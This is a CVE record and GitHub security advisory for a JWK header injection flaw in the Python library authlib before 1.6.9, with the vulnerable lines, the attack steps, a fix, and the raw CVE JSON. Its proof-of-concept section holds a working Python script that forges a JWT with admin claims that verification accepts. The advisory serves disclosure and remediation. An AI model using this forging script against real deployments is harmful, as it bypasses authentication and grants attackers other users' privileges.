Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.
PUBLISHED5.2CWE-347
Authlib JWS JWK Header Injection: Signature Verification Bypass
Problem type
Affected products
authlib
authlib
< 1.6.9 - AFFECTED
References
https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5
https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5
https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681
https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681
https://github.com/authlib/authlib/releases/tag/v1.6.9
https://github.com/authlib/authlib/releases/tag/v1.6.9
GitHub Security Advisories
GHSA-wvwj-cvrp-7pv5
Authlib JWS JWK Header Injection: Signature Verification Bypass
https://github.com/advisories/GHSA-wvwj-cvrp-7pv5Description
Summary
A JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated
attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed
to any JWS deserialization function, the library extracts and uses the cryptographic key embedded
in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own
private key, embed the matching public key in the header, and have the server accept the forged
token as cryptographically valid — bypassing authentication and authorization entirely.
This behavior violates RFC 7515 §4.1.3 and the validation algorithm defined in RFC 7515 §5.2.
Details
Vulnerable file: authlib/jose/rfc7515/jws.py
Vulnerable method: JsonWebSignature._prepare_algorithm_key()
Lines: 272–273
elif key is None and "jwk" in header:
key = header["jwk"] # ← attacker-controlled key used for verification
When key=None is passed to jws.deserialize_compact(), jws.deserialize_json(), or
jws.deserialize(), the library checks the JWT header for a jwk field. If present, it extracts
that value — which is fully attacker-controlled — and uses it as the verification key.
RFC 7515 violations:
- §4.1.3 explicitly states the
jwkheader parameter is "NOT RECOMMENDED" because keys embedded by the token submitter cannot be trusted as a verification anchor. - §5.2 (Validation Algorithm) specifies the verification key MUST come from the application
context, not from the token itself. There is no step in the RFC that permits falling back to
the
jwkheader when no application key is provided.
Why this is a library issue, not just a developer mistake:
The most common real-world trigger is a key resolver callable used for JWKS-based key lookup. A developer writes:
def lookup_key(header, payload):
kid = header.get("kid")
return jwks_cache.get(kid) # returns None when kid is unknown/rotated
jws.deserialize_compact(token, lookup_key)
When an attacker submits a token with an unknown kid, the callable legitimately returns None.
The library then silently falls through to key = header["jwk"], trusting the attacker's embedded
key. The developer never wrote key=None — the library's fallback logic introduced it. The result
looks like a verified token with no exception raised, making the substitution invisible.
Attack steps:
- Attacker generates an RSA or EC keypair.
- Attacker crafts a JWT payload with any desired claims (e.g.
{"role": "admin"}). - Attacker signs the JWT with their private key.
- Attacker embeds their public key in the JWT
jwkheader field. - Attacker uses an unknown
kidto cause the key resolver to returnNone. - The library uses
header["jwk"]for verification — signature passes. - Forged claims are returned as authentic.
PoC
Tested against authlib 1.6.6 (HEAD a9e4cfee, Python 3.11).
Requirements:
pip install authlib cryptography
Exploit script:
from authlib.jose import JsonWebSignature, RSAKey
import json
jws = JsonWebSignature(["RS256"])
# Step 1: Attacker generates their own RSA keypair
attacker_private = RSAKey.generate_key(2048, is_private=True)
attacker_public_jwk = attacker_private.as_dict(is_private=False)
# Step 2: Forge a JWT with elevated privileges, embed public key in header
header = {"alg": "RS256", "jwk": attacker_public_jwk}
forged_payload = json.dumps({"sub": "attacker", "role": "admin"}).encode()
forged_token = jws.serialize_compact(header, forged_payload, attacker_private)
# Step 3: Server decodes with key=None — token is accepted
result = jws.deserialize_compact(forged_token, None)
claims = json.loads(result["payload"])
print(claims) # {'sub': 'attacker', 'role': 'admin'}
assert claims["role"] == "admin" # PASSES
Expected output:
{'sub': 'attacker', 'role': 'admin'}
Docker (self-contained reproduction):
sudo docker run --rm authlib-cve-poc:latest \
python3 /workspace/pocs/poc_auth001_jws_jwk_injection.py
Impact
This is an authentication and authorization bypass vulnerability. Any application using authlib's JWS deserialization is affected when:
key=Noneis passed directly, or- a key resolver callable returns
Nonefor unknown/rotatedkidvalues (the common JWKS lookup pattern)
An unauthenticated attacker can impersonate any user or assume any privilege encoded in JWT claims (admin roles, scopes, user IDs) without possessing any legitimate credentials or server-side keys. The forged token is indistinguishable from a legitimate one — no exception is raised.
This is a violation of RFC 7515 §4.1.3 and §5.2. The spec is unambiguous: the jwk
header parameter is "NOT RECOMMENDED" as a key source, and the validation key MUST come from
the application context, not the token itself.
Minimal fix — remove the fallback from authlib/jose/rfc7515/jws.py:272-273:
# DELETE:
elif key is None and "jwk" in header:
key = header["jwk"]
Recommended safe replacement — raise explicitly when no key is resolved:
if key is None:
raise MissingKeyError("No key provided and no valid key resolvable from context.")
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-27962Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-27962",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-03-16T19:12:22.244Z",
"dateReserved": "2026-02-25T03:24:57.792Z",
"datePublished": "2026-03-16T17:34:38.946Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-03-16T17:34:38.946Z"
},
"title": "Authlib JWS JWK Header Injection: Signature Verification Bypass",
"descriptions": [
{
"lang": "en",
"value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9."
}
],
"affected": [
{
"vendor": "authlib",
"product": "authlib",
"versions": [
{
"version": "< 1.6.9",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-347: Improper Verification of Cryptographic Signature",
"cweId": "CWE-347",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5",
"name": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681",
"name": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681",
"tags": [
"x_refsource_MISC"
]
},
{
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"name": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
}
]
},
"adp": [
{
"providerMetadata": {
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP",
"dateUpdated": "2026-03-16T19:12:22.244Z"
},
"title": "CISA ADP Vulnrichment",
"metrics": [
{}
]
}
]
}
}